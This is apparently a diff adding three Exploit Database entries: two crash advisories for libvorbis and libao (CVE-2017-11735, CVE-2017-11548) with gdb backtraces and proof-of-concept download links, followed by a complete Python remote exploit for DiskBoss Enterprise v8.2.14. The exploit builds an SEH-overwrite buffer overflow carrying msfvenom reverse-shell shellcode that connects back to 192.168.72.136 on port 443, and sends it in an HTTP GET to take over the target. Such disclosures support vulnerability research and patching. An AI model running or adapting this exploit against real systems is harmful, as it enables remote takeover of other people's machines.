0x7ffff61752c00x7ffff61752c0 +eflags 0x202[ IF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +---Type to continue, or q to quit--- +gs 0x00 +(gdb) ni + + +Program received signal SIGSEGV, Segmentation fault. +__GI___libc_free (mem=0x80) at malloc.c:2929 +2929malloc.c: No such file or directory. +(gdb) bt +#0 __GI___libc_free (mem=0x80) at malloc.c:2929 +#1 0x00007ffff61752c5 in vorbis_block_clear () + from /usr/local/lib/libvorbis.so.0 +#2 0x00007ffff65ac5ae in splt_ogg_v_free (oggstate=0x61fca0) at ogg.c:162 +#3 0x00007ffff65ace0b in splt_ogg_info (in=, + state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0) at ogg.c:545 +#4 0x00007ffff65acf75 in splt_ogg_get_info (state=state@entry=0x60ddb0, + file_input=, error=error@entry=0x7fffffffdbf0) at ogg.c:108 +#5 0x00007ffff65ae6c7 in splt_pl_init (state=0x60ddb0, error=0x7fffffffdbf0) + at ogg.c:1482 +#6 0x00007ffff7bcac16 in splt_tp_get_original_tags_and_append ( + error=0x7fffffffdbf0, state=0x60ddb0) at tags_parser.c:545 +#7 splt_tp_process_original_tags_variable (tpu=tpu@entry=0x61f800, + state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0, + set_original_tags=1) at tags_parser.c:514 +#8 0x00007ffff7bcb4d1 in splt_tp_process_tag_variable (error=0x7fffffffdbf0, + state=0x60ddb0, tpu=0x61f800, end_paranthesis=0x7ffff7bcf14c "]", + tag_variable_start=0x7ffff7bcf146 "o,@N=1]") at tags_parser.c:363 +#9 splt_tp_process_tags (error=0x7fffffffdbf0, state=0x60ddb0, tpu=0x61f800, + tags=0x7ffff7bcf143 "%[@o,@N=1]") at tags_parser.c:293 +#10 splt_tp_put_tags_from_string (state=state@entry=0x60ddb0, + tags=tags@entry=0x7ffff7bcf143 "%[@o,@N=1]", + error=error@entry=0x7fffffffdbf0) at tags_parser.c:192 +---Type to continue, or q to quit--- +#11 0x00007ffff7bbb4f3 in mp3splt_split (state=state@entry=0x60ddb0) + at mp3splt.c:1232 +#12 0x0000000000403320 in main (argc=, + orig_argv=) at mp3splt.c:872 +(gdb) +-------------------- + int vorbis_block_clear(vorbis_block *vb){ + int i; + vorbis_block_internal *vbi=vb->internal; + + + _vorbis_block_ripcord(vb); + if(vb->localstore)_ogg_free(vb->localstore); <======== + + + if(vbi){ + for(i=0;ipacketblob[i]); + if(i!=PACKETBLOBS/2)_ogg_free(vbi->packetblob[i]); + } + _ogg_free(vbi); + } + memset(vb,0,sizeof(*vb)); + return(0); + } + + +POC: +libvorbis_1.3.5_null_pointer_dereference.ogg +CVE: +CVE-2017-11735 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42399.zip diff --git a/platforms/linux/dos/42400.txt b/platforms/linux/dos/42400.txt new file mode 100755 index 000000000..368fd7ff4 --- /dev/null +++ b/platforms/linux/dos/42400.txt @@ -0,0 +1,62 @@ +libao memory corruption vulnerability +================ +Author : qflb.wu +=============== + + +Introduction: +============= +Libao is a cross-platform audio library that allows programs to output audio using a simple API on a wide variety of platforms. + + +Affected version: +===== +1.2.0 + + +Vulnerability Description: +========================== +the _tokenize_matrix function in audio_out.c in Xiph.Org libao 1.2.0 can cause a denial of service(memory corruption) via a crafted mp3 file. + + +I found this bug when I test mpg321 0.3.2 which used the libao library. + + +./mpg321 libao_1.2.0_memory_corruption.mp3 + + +----debug info:---- +Program received signal SIGSEGV, Segmentation fault. +_int_malloc (av=av@entry=0x7ffff6f7f760 , bytes=bytes@entry=3) + at malloc.c:3740 +3740malloc.c: No such file or directory. +(gdb) bt +#0 _int_malloc (av=av@entry=0x7ffff6f7f760 , bytes=bytes@entry=3) + at malloc.c:3740 +#1 0x00007ffff6c442cc in __libc_calloc (n=, + elem_size=) at malloc.c:3219 +#2 0x00007ffff728e189 in _tokenize_matrix () from /usr/local/lib/libao.so.4 +#3 0x00007ffff728e607 in _matrix_to_channelmask () + from /usr/local/lib/libao.so.4 +#4 0x00007ffff72906f2 in _open_device () from /usr/local/lib/libao.so.4 +#5 0x000000000040a6aa in open_ao_playdevice (header=header@entry=0x624af8) + at ao.c:411 +#6 0x0000000000407e50 in output (data=, header=0x624af8, + pcm=0x627f44) at mad.c:974 +#7 0x00007ffff749a85c in run_sync (decoder=0x7fffffffbc40) at decoder.c:439 +#8 0x00007ffff749ab38 in mad_decoder_run ( + decoder=decoder@entry=0x7fffffffbc40, + mode=mode@entry=MAD_DECODER_MODE_SYNC) at decoder.c:557 +#9 0x0000000000403d5d in main (argc=, argv=) + at mpg321.c:1092 +(gdb) + + +POC: +libao_1.2.0_memory_corruption.mp3 +CVE: +CVE-2017-11548 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42400.zip diff --git a/platforms/windows/remote/42395.py b/platforms/windows/remote/42395.py new file mode 100755 index 000000000..c008579be --- /dev/null +++ b/platforms/windows/remote/42395.py @@ -0,0 +1,117 @@ +#!/usr/bin/env python +# Exploit Title: DiskBoss Enterprise v8.2.14 Remote buffer overflow +# Date: 2017-07-30 +# Exploit Author: Ahmad Mahfouz +# Author Homepage: www.unixawy.com +# Vendor Homepage: http://www.diskboss.com/ +# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.2.14.exe +# Version: v8.2.14 +# Tested on: Windows 7 SP1 x64 +# Category; Windows Remote Exploit +# Description: DiskBoss Enterprise with management web-console enabled can lead to full system takeover. + +import socket,sys + +print "-----------------------------------------" +print "- DiskBoss Enterprise v8.2.14 TakeOver -" +print "- Tested on windows 7 x64 -" +print "- by @eln1x -" +print "-----------------------------------------" + + +try: + target = sys.argv[1] +except: + print "Usage ./DB_E_v8.2.14.py 192.168.1.2" + sys.exit(1) +port = 80 + + +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.72.136 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python +shellcode = "\x89\xe0\xdd\xc0\xd9\x70\xf4\x58\x50\x59\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x6d\x38\x4c" +shellcode += "\x42\x35\x50\x77\x70\x67\x70\x65\x30\x4b\x39\x6a\x45" +shellcode += "\x36\x51\x59\x50\x61\x74\x6e\x6b\x70\x50\x56\x50\x4e" +shellcode += "\x6b\x30\x52\x64\x4c\x6c\x4b\x71\x42\x72\x34\x6e\x6b" +shellcode += "\x73\x42\x36\x48\x34\x4f\x58\x37\x70\x4a\x54\x66\x36" +shellcode += "\x51\x6b\x4f\x4c\x6c\x57\x4c\x43\x51\x61\x6c\x44\x42" +shellcode += "\x76\x4c\x45\x70\x69\x51\x78\x4f\x46\x6d\x65\x51\x59" +shellcode += "\x57\x6d\x32\x4c\x32\x33\x62\x43\x67\x6c\x4b\x36\x32" +shellcode += "\x74\x50\x4e\x6b\x61\x5a\x55\x6c\x4c\x4b\x30\x4c\x46" +shellcode += "\x71\x43\x48\x68\x63\x67\x38\x55\x51\x6a\x71\x66\x31" +shellcode += "\x4c\x4b\x42\x79\x37\x50\x55\x51\x6b\x63\x4e\x6b\x67" +shellcode += "\x39\x66\x78\x6a\x43\x67\x4a\x37\x39\x6c\x4b\x37\x44" +shellcode += "\x4c\x4b\x77\x71\x6e\x36\x36\x51\x49\x6f\x4c\x6c\x7a" +shellcode += "\x61\x38\x4f\x36\x6d\x66\x61\x6a\x67\x55\x68\x59\x70" +shellcode += "\x42\x55\x4a\x56\x76\x63\x43\x4d\x5a\x58\x37\x4b\x63" +shellcode += "\x4d\x56\x44\x51\x65\x7a\x44\x43\x68\x6e\x6b\x31\x48" +shellcode += "\x37\x54\x56\x61\x58\x53\x51\x76\x6e\x6b\x46\x6c\x62" +shellcode += "\x6b\x6e\x6b\x61\x48\x65\x4c\x46\x61\x5a\x73\x4e\x6b" +shellcode += "\x44\x44\x6c\x4b\x63\x31\x5a\x70\x4f\x79\x61\x54\x37" +shellcode += "\x54\x34\x64\x31\x4b\x43\x6b\x33\x51\x66\x39\x61\x4a" +shellcode += "\x70\x51\x79\x6f\x69\x70\x71\x4f\x31\x4f\x30\x5a\x6c" +shellcode += "\x4b\x45\x42\x48\x6b\x4c\x4d\x31\x4d\x61\x78\x34\x73" +shellcode += "\x57\x42\x75\x50\x43\x30\x73\x58\x72\x57\x61\x63\x67" +shellcode += "\x42\x61\x4f\x73\x64\x61\x78\x50\x4c\x64\x37\x51\x36" +shellcode += "\x34\x47\x69\x6f\x58\x55\x6d\x68\x5a\x30\x36\x61\x75" +shellcode += "\x50\x53\x30\x64\x69\x4b\x74\x61\x44\x66\x30\x35\x38" +shellcode += "\x66\x49\x4d\x50\x32\x4b\x65\x50\x39\x6f\x49\x45\x62" +shellcode += "\x70\x50\x50\x56\x30\x42\x70\x67\x30\x70\x50\x67\x30" +shellcode += "\x52\x70\x70\x68\x78\x6a\x36\x6f\x69\x4f\x49\x70\x69" +shellcode += "\x6f\x4b\x65\x6f\x67\x62\x4a\x35\x55\x51\x78\x6b\x70" +shellcode += "\x6e\x48\x67\x38\x6b\x38\x51\x78\x73\x32\x63\x30\x76" +shellcode += "\x61\x4f\x4b\x4f\x79\x6a\x46\x33\x5a\x56\x70\x63\x66" +shellcode += "\x71\x47\x71\x78\x5a\x39\x4c\x65\x31\x64\x35\x31\x39" +shellcode += "\x6f\x78\x55\x6b\x35\x4b\x70\x52\x54\x64\x4c\x59\x6f" +shellcode += "\x42\x6e\x73\x38\x44\x35\x5a\x4c\x70\x68\x5a\x50\x6f" +shellcode += "\x45\x4e\x42\x73\x66\x59\x6f\x4a\x75\x30\x68\x35\x33" +shellcode += "\x50\x6d\x32\x44\x75\x50\x4f\x79\x69\x73\x73\x67\x70" +shellcode += "\x57\x32\x77\x55\x61\x49\x66\x51\x7a\x64\x52\x61\x49" +shellcode += "\x70\x56\x7a\x42\x49\x6d\x70\x66\x4b\x77\x33\x74\x66" +shellcode += "\x44\x67\x4c\x77\x71\x53\x31\x6e\x6d\x37\x34\x65\x74" +shellcode += "\x34\x50\x39\x56\x73\x30\x33\x74\x62\x74\x52\x70\x61" +shellcode += "\x46\x33\x66\x76\x36\x30\x46\x36\x36\x62\x6e\x32\x76" +shellcode += "\x50\x56\x66\x33\x43\x66\x71\x78\x71\x69\x5a\x6c\x77" +shellcode += "\x4f\x4c\x46\x4b\x4f\x5a\x75\x6e\x69\x59\x70\x62\x6e" +shellcode += "\x30\x56\x67\x36\x6b\x4f\x30\x30\x31\x78\x55\x58\x6c" +shellcode += "\x47\x45\x4d\x71\x70\x59\x6f\x6b\x65\x4d\x6b\x38\x70" +shellcode += "\x38\x35\x6e\x42\x76\x36\x50\x68\x69\x36\x6f\x65\x6d" +shellcode += "\x6d\x6d\x4d\x6b\x4f\x6b\x65\x47\x4c\x36\x66\x63\x4c" +shellcode += "\x75\x5a\x4f\x70\x6b\x4b\x4b\x50\x50\x75\x57\x75\x6f" +shellcode += "\x4b\x43\x77\x62\x33\x70\x72\x32\x4f\x50\x6a\x75\x50" +shellcode += "\x42\x73\x6b\x4f\x39\x45\x41\x41" + +payload = shellcode +payload += 'A' * (2492 - len(payload)) + +payload += '\xEB\x10\x90\x90' # NSEH: First Short JMP +payload += '\xCA\xA8\x02\x10' # SEH : POP EDI POP ESI RET 04 libpal.dll +payload += '\x90' * 10 +payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode + + +payload += 'D' * (5000-len(payload)) +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) +try: + s.connect((target,port)) + print "[*] Connection Success." +except: + print "Connction Refused %s:%s" %(target,port) + sys.exit(2) + + +packet = "GET /../%s HTTP/1.1\r\n" %payload +packet += "Host: 4.2.2.2\r\n" +packet += "Connection: keep-alive\r\n" +packet += "Paragma: no-cache\r\n" +packet += "Cahce-Control: no-cache\r\n" +packet += "User-Agent: H4X0R\r\n" +packet += "Referer: http://google.com\r\n" +packet += "\r\n" + +print "[*] Get nt authority or die hard" +s.send(packet) +s.close()